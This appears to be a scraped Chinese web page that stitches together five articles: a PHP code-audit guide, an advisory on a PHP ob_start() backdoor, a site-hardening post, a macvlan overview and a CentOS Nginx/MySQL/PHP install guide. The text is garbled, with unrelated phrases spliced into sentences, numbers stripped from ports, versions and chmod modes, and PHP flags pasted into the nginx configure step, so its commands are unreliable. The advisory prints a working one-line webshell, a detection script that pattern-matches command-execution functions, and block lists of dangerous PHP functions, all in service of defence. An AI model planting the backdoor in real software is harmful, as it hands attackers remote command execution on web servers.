1.代码审计思路之PHP代码审计
2.网站安全分析:PHP ob_start函数后门分析
3.谈谈网站安全性的源码问题
4.Linux虚拟网络中的macvlan设备源码分析
5.CentOS 6.2编译安装Nginx1.0.14+MySQL5.5.22+PHP5.3.10步骤分享

代码审计思路之PHP代码审计

       ×0 前言

       进行PHP代码审计时，关注点与目标明确对提升审计效率至关重要。源码本文将分享PHP代码审计的源码一些思路和方法，帮助在审计过程中更加系统地发现潜在问题。源码

       ×1 前期工作,源码需要的工具

       使用集成环境PHPStorm可以提高代码编写与调试的效率。静态代码扫描工具如Fotify有助于快速识别代码中的源码指间网页端源码问题，降低误报率。源码seay和CodeQl是源码源代码审计与自动化代码审计的强大工具，其中CodeQl为非商业的源码开源选择。Xcheck是源码一款专注于检测业务代码安全风险的工具，特别适用于寻找由不可信输入引发的源码安全漏洞。

       ×3 明确目标

       在进行审计前，源码首先要明确审计的源码目的，可能有三种情况：提升审计经验、源码寻找可利用的源码漏洞、挖掘0day或证书。不同目的下的审计侧重点不同，例如为了发现漏洞进行渗透测试，可以重点使用自动化工具，关注文件上传、包含、SQL注入等严重危害的漏洞。

       一>所有资源获取

       ×4 判断是否是用了框架

       了解是否使用了框架对审计过程至关重要，框架的结构通常更规整，易于定位关键函数集。对于使用了框架的项目，审计重点在于控制器（C）部分，因为大部分功能点都集中在控制器中。溯源码扎带

       PHP主流框架包括Laravel、ThinkPHP、yii等，它们大多采用MVC设计模式。对于ThinkPHP，其目录结构在版本3和5有所不同，但控制器（C）仍是审计的关键。

       4.2. Laravel框架

       在Laravel框架中，审计重点同样集中在控制器（C）中，因为大部分功能实现都在这里。

       4.3. 如果没用框架

       没有使用框架时，需要关注的点包括函数集文件、配置文件、安全过滤文件、index文件等。函数集文件通常包含function或common关键字，配置文件中可能包含config关键字，安全过滤文件对审计至关重要。

       ×5 了解路由

       了解路由有助于快速定位漏洞位置。对于框架如Thinkphp，其路由规则清晰，审计时可通过路由直接访问漏洞方法。不同模式的路由配置（普通模式、混合模式、强制模式）需了解清楚，以便更好地定位和利用。

       ×6 审计

       在审计前，波猫商店源码可以使用自动化工具如xcheck、Fotify、codeql等进行初步扫描。根据报告验证审计发现，然后按类型深入审计，如SQL注入、XSS、CSRF、SSRF、XML外部实体注入等。

       6.1. 鉴权

       对于权限认证的审计，主要关注是否存在越权访问和未授权访问情况，通常后台管理是需要权限认证的地方。

       6.2. 按照漏洞类型审计

       根据漏洞类型定位可能存在漏洞的地方，如SQL注入、XSS、CSRF、SSRF、XML外部实体注入等，然后回溯验证参数可控性，快速定位漏洞。

       6.2.1. SQL注入

       审计时，重点关注是否存在字符串拼接并可被用户控制的SQL语句。

       6.2.2. XSS漏洞

       注意直接输出用户输入的地方，检查数据输出函数和全局拦截器、过滤器。

       6.2.3. CSRF漏洞

       CSRF攻击利用场景通常涉及敏感功能，源码资本医药投资审计时寻找生成随机token和token验证的逻辑。

       6.2.4. SSRF漏洞

       审计时注意访问端口、协议和内网IP的限制，以及使用file、tl_exec、popen等关键词，回溯参数可控性。

       6.2.. 任意文件下载/下载漏洞审计

       关注fget、file_get_contents、readfile、parse_ini_file、highlight_file、file、fopen、readfile、fread等函数，验证变量可控性。

       6.2.. 任意文件删除

       审计时搜索rmdir、unlink等函数，确保变量可控。

       6.2.. 任意文件写入

       注意copy、file_put_contents、fwrite等函数，检查可控变量。

       6.2.. 会话认证漏洞

       审计会话认证漏洞时，需关注cookie生成逻辑、用户身份验证方式，天梭溯源码确保会话状态安全。

       6.2.. 反序列化漏洞

       审计时注意全局搜索serialize，检查是否存在可控变量。

网站安全分析:PHP ob_start函数后门分析

       9月日消息：站长之家从日志宝安全团队获悉，近日，根据日志宝分析平台的分析数据显示，部分网站的访问日志中存在大量命令执行类后门行为。

       我们与用户取得联系后拿到后门文件代码。此类后门通过PHP的ob_start()函数触发，利用ob_start()函数回调机制调用命令执行类函数并接受黑客远程发送的命令，此类后门代码可以躲避部分常见后门关键字查杀程序，最终以Web服务器权限远程执行任意命令。

PHP 手册中关于ob_start()函数回调机制的相关说明：

       Ob_start()函数后门代码如下：

php

           $cmd = 'system';ob_start($cmd);echo "$_GET[a]";ob_end_flush();

           ?

       后门利用效果如下图：

       针对此类后门行为，建议站长们检查网页源代码中是否出现ob_start()函数调用，并检查ob_start()的参数是否是常见的命令执行类函数（system，exec，popen，shell_exec等）或者其他可疑函数调用。

       为了方便站长们检查网站源代码中是否出现可疑后门程序或者危险函数调用，日志宝安全团队编写了一款简易的PHP后门检测小脚本，可以快速方便的帮助站长检测网站文件是否被插入恶意后门代码，源代码和使用方法如下：

       #!/usr/bin/php -q

php

       #简易PHPwebshell检测脚本-By 日志宝安全团队

       #检测特征如下:

       #eval($_POST 匹配 eval($_POST[cmd])--PHP一句话后门代码

       #system(),exec(),shell_exec(),popen(),passthru(),proc_open()这些函数可以执行系统命令，名且在PHPSPY木马中使用

       #phpinfo() 后门中经常出现的函数，正常文件中也可能出现造成敏感信息泄露

       #eval(base 匹配经过base编码后的后门

       #eval(gzuncompress 匹配经过gzip压缩过的后门

       #`*` 匹配类似`$_REQUEST[cmd]`的一句话后门

       #其他可以远程执行命令或者直接生成后门文件的危险函数(dl,assert,error_log,ob_start,preg_replace /e)

       #使用方法

       ./findshell.php /home/wwwroot/(此处填写web目录路径) result.log

       程序的分析结果将保存在当前目录下的result.log文件中

       set_time_limit(0);

       function find($directory)

        {

         $mydir=dir($directory);

         while($file=$mydir-read()){

          if((is_dir("$directory/$file"))($file!=".")($file!=".."))

          {

           find("$directory/$file");

          }

          else{

           if($file != "." $file != ".."eregi(".php",$file)){

           $fd=realpath($directory."/".$file);

           $fp = fopen($fd, "r");

           $i=0;

           while ($buffer = fgets($fp, )) {

            $i++;  if((eregi("eval($_POST",$buffer))||(eregi("system(",$buffer))||(eregi("exec(",$buffer))||(eregi("shell_exec(",$buffer))||(eregi("popen(",$buffer))||(eregi("phpinfo(",$buffer))||(eregi("passthru(",$buffer))||(eregi("proc_open(",$buffer))||(eregi("phpspy",$buffer))||(eregi("eval(base",$buffer))||(eregi("eval(gzuncompress",$buffer))||(eregi("preg_replace(/^/e,$",$buffer))||(eregi("preg_replace("/^/e",$buffer))||(eregi("assert(",$buffer))||(eregi("ob_start(",$buffer))||(eregi("error_log(",$buffer))||(eregi("dl(",$buffer))){

       all();

       echo "可疑文件路径:".$fd."rnLine".$i.":".$buffer."rnrn";

       }

            }

           fclose($fp);

           }

          }

         }

         $mydir-close();

        }

       function all()

         {

         static $count = 1;

         echo $count;

         $count++;

         }

       find($argv[1]);

       使用日志宝分析日志可以发现绝大部分常见Web后门的可疑访问行为，但是由于PHP语法的松散导致可以利用常规函数实现部分后门行为，比如执行系统命令等，因此也会出现一些遗漏和误报。在开发网站的过程中开发者需要有一定的安全编程意识，注意变量的初始化以及其他逻辑问题，加入一些安全过滤函数等防范措施，从网站本身的代码安全做起，才能起到深度防御的效果。希望广大站长能够通过日志宝分享的安全知识技巧了解到更多Web安全相关内容，让自己的网站更加稳定、安全的运行。

       注明：本安全报告来自日志宝，官方网站www.rizhibao.com

谈谈网站安全性的问题

       刚入职没多长时间，网站一直有人上传木马，基本网站一直处在被人攻击的状态，纠结阿。一直忙着解决这问题了。今天好不容易有些成就，就拿出来和大家分享一下，如果大家有什么好的方法，可以教教我.这两天为了这事儿头疼死了.

       网站现在大体的情况是dede+smarty开发的博客系统+dz，百度和谷歌的权重都在5左右，所以访问量还是比较大的。

       dede公认的漏洞比较多，而且接手的这个dede还二次开发过。所以短时间内找漏洞是不太可能了，如果有朋友之类的话，可以让他们一起检测，毕竟一个人太麻烦了，或者加我QQ

       1.网站目录安全性

       1所有的目录可以设置权限，css和images文件，css可以设置读写权限，不给执行权限，css经常改的话给写权限，文件只给读的权限就可以了,去掉所有不用经常改的PHP文件写入权限，不给任何攻击者将代码写入php中的机会

       2经常扫描是否有特殊后缀或者新被上传的文件，看源码,尤其是inc后缀的

       2.网站安全检测

       网站安全检测，这个还是比较好使的，不过有没有其他的想法就不知道了，哈哈检测完了有修复的提示。

       2自己写一个检测网站木马文件的脚本，网上也有，他本身就是木马，找一个没有后门之类的，上传上去，自己检测。这个还是非常不错的。看清楚源码以后删除木马文件。

       3使用DOMAIN3.5之类的上传注入软件自己测试一下网站。

       3.修改服务器配置增加安全性

       1在apache配置文件中禁止一些目录执行php文件的权限，比如uploads/,html/等。下面是一个例子:

        双击代码全选

       1

       2

       3

       4

       5

       6

       Directory "/usr/local/apache2/htdocs/uploads"

       Files ~ ".php"

       Order allow,deny

       Deny from all

       /Files

       /Directory

        2有些不希望别人访问的目录也直接禁止掉。

       3修改php.ini的disable_functions添加禁止的函数，如

       system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_file,dl,socket_listen,socket_create,socket_bind,socket_accept, socket_connect, stream_socket_server, stream_socket_accept,stream_socket_client,ftp_connect, ftp_login,ftp_pasv,ftp_get,sys_getloadavg,disk_total_space, disk_free_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname

       4.其他方式

       1.打补丁，尤其是坑爹的dede

       2。经常修改服务器的帐号密码，ftp帐号密码，最好用sftp

       3.最好把dede后台的文件管理器关闭，还有dede数据库备份还原。以及文章里的上传之类的全部做过滤，禁止上传其他格式，尤其是php格式的文件。

       4.对linux服务器不是特别懂，所以就先不说这个了。以后学成了再和大家讨论

Linux虚拟网络中的macvlan设备源码分析

       Linux虚拟网络中的macvlan设备源码分析

       macvlan是Linux内核提供的一种新特性，用于在单个物理网卡上创建多个独立的虚拟网卡。支持macvlan的内核版本包括v3.9-3.和4.0+，推荐使用4.0+版本。macvlan通常作为内核模块实现，可通过以下命令检测系统是否支持：

       1. modprobe macvlan - 加载模块

       2. lsmod | grep macvlan - 确认是否已加载

       对于学习和资源分享，可以加入Linux内核源码交流群获取相关学习资料，前名成员可免费领取价值的内核资料包。

       macvlan的工作原理与VLAN不同，macvlan子接口拥有独立的MAC地址和IP配置，每个子接口可以视为一个独立的网络环境。通过子接口，macvlan可以实现流量隔离，根据包的目的MAC地址决定转发给哪个虚拟网卡。macvlan的网络模式包括private、vepa、bridge和passthru，分别提供不同的通信和隔离策略。

       与传统VLAN相比，macvlan在子接口独立性和广播域共享上有所不同。macvlan的子接口使用独立MAC地址，而VLAN共享主接口的MAC。此外，macvlan可以直接接入到VM或network namespace，而VLAN通常通过bridge连接。

       总的来说，macvlan是Linux网络配置中的强大工具，理解其源码有助于深入掌握其内部机制。对于网络配置和性能优化的探讨，可以参考以下文章和视频：

       Linux内核性能优化实战演练（一）

       理解网络数据在内核中流转过程

       Linux服务器数据恢复案例分析

       虚拟文件系统操作指南

       Linux共享内存同步方法

       最后，关于macvlan与VLAN的详细对比，以及mactap技术，可以参考相关技术社区和文章，如内核技术中文网。

CentOS 6.2编译安装Nginx1.0.+MySQL5.5.+PHP5.3.步骤分享

       说明：

       操作系统：CentOS 6.2 位

           准备篇：

           一、配置好IP、DNS 、网关，确保使用远程连接工具能够连接服务器

           二、配置防火墙，开启端口、端口

           vi /etc/sysconfig/iptables

           -A INPUT -m state --state NEW -m tcp -p tcp --dport -j ACCEPT（允许端口通过防火墙）

           -A INPUT -m state --state NEW -m tcp -p tcp --dport -j ACCEPT（允许端口通过防火墙）

           特别提示：很多网友把这两条规则添加到防火墙配置的最后一行，导致防火墙启动失败，正确的应该是添加到默认的端口这条规则的下面

           添加好之后防火墙规则如下所示：

           #########################################################

           # Firewall configuration written by system-config-firewall

           # Manual customization of this file is not recommended.

           *filter

           :INPUT ACCEPT [0:0]

           :FORWARD ACCEPT [0:0]

           :OUTPUT ACCEPT [0:0]

           -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

           -A INPUT -p icmp -j ACCEPT

           -A INPUT -i lo -j ACCEPT

           -A INPUT -m state --state NEW -m tcp -p tcp --dport -j ACCEPT

           -A INPUT -m state --state NEW -m tcp -p tcp --dport -j ACCEPT

           -A INPUT -m state --state NEW -m tcp -p tcp --dport -j ACCEPT

           -A INPUT -j REJECT --reject-with icmp-host-prohibited

           -A FORWARD -j REJECT --reject-with icmp-host-prohibited

           COMMIT

           #########################################################

           /etc/init.d/iptables restart #最后重启防火墙使配置生效

           三、关闭SELINUX

           vi /etc/selinux/config

           #SELINUX=enforcing #注释掉

           #SELINUXTYPE=targeted #注释掉

           SELINUX=disabled #增加

           :wq 保存，关闭

           shutdown -r now #重启系统

           四 、系统约定

           软件源代码包存放位置：/usr/local/src

           源码包编译安装位置：/usr/local/软件名字

           五、下载软件包

           1、下载nginx（目前稳定版）

           .php.net/distributions/php-5.3..tar.gz

           5、下载cmake（MySQL编译工具）

           f /etc/my.cnf #拷贝配置文件（注意：如果/etc目录下面默认有一个my.cnf，直接覆盖即可）

           vi /etc/my.cnf #编辑配置文件,在 [mysqld] 部分增加

           datadir = /data/mysql #添加MySQL数据库路径

           ./scripts/mysql_install_db --user=mysql #生成mysql系统数据库

           cp ./support-files/mysql.server /etc/rc.d/init.d/mysqld #把Mysql加入系统启动

           chmod /etc/init.d/mysqld #增加执行权限

           chkconfig mysqld on #加入开机启动

           vi /etc/rc.d/init.d/mysqld #编辑

           basedir = /usr/local/mysql #MySQL程序安装路径

           datadir = /data/mysql #MySQl数据库存放目录

           service mysqld start #启动

           vi /etc/profile #把mysql服务加入系统环境变量：在最后添加下面这一行

           export PATH=$PATH:/usr/local/mysql/bin

           下面这两行把myslq的库文件链接到系统默认的位置，这样你在编译类似PHP等软件时可以不用指定mysql的库文件地址。

           ln -s /usr/local/mysql/lib/mysql /usr/lib/mysql

           ln -s /usr/local/mysql/include/mysql /usr/include/mysql

           shutdown -r now #需要重启系统，等待系统重新启动之后继续在终端命令行下面操作

           mysql_secure_installation #设置Mysql密码

           根据提示按Y 回车输入2次密码

           或者直接修改密码/usr/local/mysql/bin/mysqladmin -u root -p password "" #修改密码

           service mysqld restart #重启

           到此，mysql安装完成！

           五、安装 nginx

           groupadd www #添加www组

           useradd -g www www -s /bin/false #创建nginx运行账户www并加入到www组，不允许www用户直接登录系统cd /usr/local/src

           tar zxvf nginx-1.0..tar.gz

           cd nginx-1.0.

           ./configure --prefix=/usr/local/nginx --user=www --group=www --with-tl --enable-sockets --with-xmlrpc --enable-zip --enable-soap --without-pear --with-gettext --enable-session --with-mcrypt --with-curl #配置

           make #编译

           make install #安装

           cp php.ini-production /usr/local/php5/etc/php.ini #复制php配置文件到安装目录

           rm -rf /etc/php.ini #删除系统自带配置文件

           ln -s /usr/local/php5/etc/php.ini /etc/php.ini #添加软链接

           cp /usr/local/php5/etc/php-fpm.conf.default /usr/local/php5/etc/php-fpm.conf #拷贝模板文件为php-fpm配置文件

           vi /usr/local/php5/etc/php-fpm.conf #编辑

           user = www #设置php-fpm运行账号为www

           group = www #设置php-fpm运行组为www

           pid = run/php-fpm.pid #取消前面的分号

           设置 php-fpm开机启动

           cp /usr/local/src/php-5.3./sapi/fpm/init.d.php-fpm /etc/rc.d/init.d/php-fpm #拷贝php-fpm到启动目录

           chmod +x /etc/rc.d/init.d/php-fpm #添加执行权限

           chkconfig php-fpm on #设置开机启动

           vi /usr/local/php5/etc/php.ini #编辑配置文件

           找到：;open_basedir =

           修改为：open_basedir = .:/tmp/ #防止php木马跨站，重要！！

           找到：disable_functions =

           修改为：disable_functions = passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,escapeshellcmd,dll,popen,disk_free_space,checkdnsrr,checkdnsrr,getservbyname,getservbyport,disk_total_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname

           #列出PHP可以禁用的函数，如果某些程序需要用到这个函数，可以删除，取消禁用。

           找到：;date.timezone =

           修改为：date.timezone = PRC #设置时区

           找到：expose_php = On

           修改为：expose_php = OFF #禁止显示php版本的信息

           找到：display_errors = On

           修改为：display_errors = OFF #关闭错误提示

           七、配置nginx支持php

           vi /usr/local/nginx/conf/nginx.conf

           修改/usr/local/nginx/conf/nginx.conf 配置文件,需做如下修改

           user www www; #首行user去掉注释,修改Nginx运行组为www www；必须与/usr/local/php5/etc/php-fpm.conf中的user,group配置相同，否则php运行出错

           index index.php index.html index.htm; #添加index.php

           # pass the PHP scripts to FastCGI server listening on .0.0.1:

           #

           location ~ /.php$ {

           root html;

           fastcgi_pass .0.0.1:;

           fastcgi_index index.php;

           fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;

           include fastcgi_params;

           }

           #取消FastCGI server部分location的注释,并要注意fastcgi_param行的参数,改为$document_root$fastcgi_script_name,或者使用绝对路径

           /etc/init.d/nginx restart #重启nginx

           八、配置php支持Zend Guard

           安装Zend Guard

           cd /usr/local/src

           mkdir /usr/local/zend #建立Zend安装目录

           tar xvfz ZendGuardLoader-php-5.3-linux-glibc-i.tar.gz #解压安装文件

           cp ZendGuardLoader-php-5.3-linux-glibc-i/php-5.3.x/ZendGuardLoader.so /usr/local/zend/ #拷贝文件到安装目录

           vi /usr/local/php5/etc/php.ini #编辑文件

           在最后位置添加以下内容

           [Zend Guard]

           zend_extension=/usr/local/zend/ZendGuardLoader.so

           zend_loader.enable=1

           zend_loader.disable_licensing=0

           zend_loader.obfuscation_level_support=3

           zend_loader.license_path=

           测试篇

           cd /usr/local/nginx/html/ #进入nginx默认网站根目录

           rm -rf /usr/local/nginx/html/* #删除默认测试页

           vi index.php #新建index.php文件

           ?php

           phpinfo();

           ?

           :wq! #保存

           chown www.www /usr/local/nginx/html/ -R #设置目录所有者

           chmod /usr/local/nginx/html/ -R #设置目录权限

           shutdown -r now #重启

           在客户端浏览器输入服务器IP地址，可以看到相关的配置信息！

           service nginx restart #重启nginx

           service mysqld restart #重启mysql

           /usr/local/php5/sbin/php-fpm #启动php-fpm

           /etc/rc.d/init.d/php-fpm restart #重启php-fpm

           /etc/rc.d/init.d/php-fpm stop #停止php-fpm

           /etc/rc.d/init.d/php-fpm start #启动php-fpm

           #############################################################################

           备注：

           nginx默认站点目录是：/usr/local/nginx/html/

           权限设置：chown www.www /usr/local/nginx/html/ -R

           MySQL数据库目录是：/data/mysql

           权限设置：chown mysql.mysql -R /data/mysql

           到此，CentOS 6.2下 Nginx1.0.+MySQL5.5.+PHP5.3.+Zend Guard Loader基本运行环境搭建完成！